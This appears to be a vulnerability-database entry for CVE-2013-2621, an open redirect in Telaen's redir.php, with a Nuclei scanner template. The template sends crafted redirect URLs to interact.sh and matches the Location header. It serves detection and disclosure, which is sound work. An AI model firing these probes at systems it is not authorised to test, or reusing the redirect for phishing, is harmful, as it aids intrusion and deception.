CVE-2013-2621: Telaen => v1.3.1 - Open Redirect

2025-08-01 Telaen PoC Public

Description

Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.

PoC

id: CVE-2013-2621

info:
  name: Telaen => v1.3.1 - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Upgrade to the latest version of Telaen to fix the open redirect vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/38546
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683
    - https://nvd.nist.gov/vuln/detail/CVE-2013-2621
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2013-2621
    cwe-id: CWE-601
    epss-score: 0.10692
    epss-percentile: 0.95576
    cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: telaen_project
    product: telaen
  tags: cve2013,cve,telaen,redirect,telaen_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/telaen/redir.php?https://interact.sh"
      - "{{BaseURL}}/redir.php?https://interact.sh"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 490a00463044022022aeab463aa67fd4e52e6de9f2a8703971e7df31956b8c2d2d0df6ed12f2962802202182d7a0a0bb37381643e0f051561fa637d780eeaacaa44542323a48fd2c428a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities